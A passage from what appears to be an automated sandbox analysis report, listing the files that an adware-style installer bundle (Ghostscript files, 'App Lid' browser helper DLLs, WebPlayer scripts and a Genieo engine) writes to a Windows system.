C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\markhint.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciecs2.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l.xpm (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ksb_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\prfont.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pdf_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ps2ai.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS (700 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lgx_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\traceimg.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fform.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\markpath.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_btokn.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps2.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018035l.pfb (24930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_res.ps (8594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019044l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_stres.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021024l.pfb (22674 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dscp.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mex_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m.xpm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_rdlin.ps (886 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\fonts.dir (4850 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\docie.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_il1_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022004l.pfb (28914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\level1.ps (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciecs3.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewmiff.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_il2_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019004l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l_m.xbm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\z003034l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052024l.pfb (32698 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\image-qa.ps (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\d050000l.pfb (11394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059033l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021004l.pfb (25474 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gsnup.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\decrypt.ps (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cspace.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\font2c.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010033l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fapi.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_css_e.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\fonts.scale (4850 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.OSF (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewcmyk.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l.xbm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cmdl.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\printafm.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\traceop.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\caption.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Info-macos.plist (483 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pdfwr.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_init.ps (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\unprot.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lgo_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_indxd.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ttf.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gswin32c.exe (31554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_icc.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\COPYING (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdfopt.ps (9458 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mro_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl1_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidtt.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.OS2 (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_std_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010035l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidfm.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.ATB (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\xlatmap (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ll3.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.SGI (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.ATM (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewjpeg.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\bdftops.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_statd.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ht_ccsto.ps (56210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_patrn.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\errpage.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devn.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pphs (220 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019063l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_sec.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.Sol (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stcolor.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\font2pcl.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.Ult (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022024l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021023l.pfb (24930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_epsf.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\type1enc.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ce_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018032l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_setpd.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\s050000l.pfb (7778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.VMS (1442 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s.xbm (605 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fntem.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dpnxt.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciddc.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019043l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps1.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\showchar.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fonts.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_diskn.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pphs.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059013l.pfb (27394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\wftopfa.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\quit.ps (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_diskf.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devpxl.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stcinfo.ps (4226 bytes)

The process regsvr32.exe:3688 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Program Files% (x86)\App Lid\App Lid-bho64.dll (835 bytes)

The process regsvr32.exe:3404 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Program Files% (x86)\App Lid\App Lid-bho.dll (671 bytes)

The process webplayer_installer.exe:716 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\storage.js (979 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\WebPlayer.exe (7533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\initialize.js (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\common.js (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\initialize.js (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\main.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\main.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (843 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\jsonstorage.js (651 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\config.xml (823 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\json.js (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\shortcut.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\web_player.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfA2A6.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\installer.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\xhr.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\tray.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\stub.html (680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\event_listener.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\utils.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\io.js (751 bytes)

The process framework_setup.gen:1048 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\targetDefaultPortals.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_tmp_template.txt (61 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\gad_categories.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\xstream-1.3.1.jar (15168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_datetime.stop (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.l4j.ini (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops2_stemmed.stop (416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\Info_1_7.plist (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\de_top_1000_draft.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\da_topwords.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\tr_stops_stemmed.stop (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\servlet-api-2.5.jar (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\heb_white_list.txt (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\smtp.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\genieo_console.l4j.ini (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_common500cleaned.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\x64\NativeUtils.dll (21216 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-core-1.0.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\da_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\sac.jar (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_MergedStemmedEnglish.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\NativeUtils.dll (16424 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\en_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jetty-webapp-7.3.0.v20110203.jar (32128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_installing.png (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\rome-1.0.jar (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\framework_uninstall.exe (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\es_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\nl_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_numbers.stop (54 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\xpp3_min-1.1.4c.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\sqlite-jdbc-3.7.2-windows.jar (20624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\it_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed1.stop (559 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed_more.stop (583 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\engine_tray_icon_dev.png (632 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ro_morestops.stop (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\ini4j-0.5.1.jar (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\modules-0.3.2.jar (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\dd-plist.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\en_nationalities.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\bannedList.dat (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\commons-codec-1.6.jar (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_outb.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_mapping_outb.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-runtime-1.0.1.jar (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\slf4j-api-1.6.0.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\Info.plist (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_misc.stop (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\cssparser-0.9.5.jar (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_disabled.png (421 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_anabel.stop (319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_date_time.stop (499 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\defaultPortals.xml (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\log4j-1.2.15.jar (13368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\commons-logging-1.1.1.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\ro_topwords.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\defaultFeeds.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\genieoLogo24.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\readme.txt (610 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpcore-4.2.jar (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\slf4j-log4j12-1.6.0.jar (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\es_merged_stemmed.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\es_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_numbers_and_currencies.stop (78 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\hu_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_release_mac.properties (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\restfb-1.6.12.jar (10136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ru_stops_stemmed2.stop (892 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpmime-4.2.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed_new.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\sitelang.txt (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_new_items.png (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-collectionschema-1.0.1.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\product_domains.txt (571 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ru_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_release.properties (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\tr_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\it_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\fr_lang.properties (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_merged_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\hu_stops_stemmed.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_ToBeAddedToStop.stop (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_stemmed_v0.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\engine.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\engine.jar (65930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\zombie_icon.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_ob_withadult.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\log4j_dev.properties (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\sv_topwords.txt (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_date_time.stop (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_merged_stemmed2.stop (347 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_tmp_template_all.txt (176 bytes)
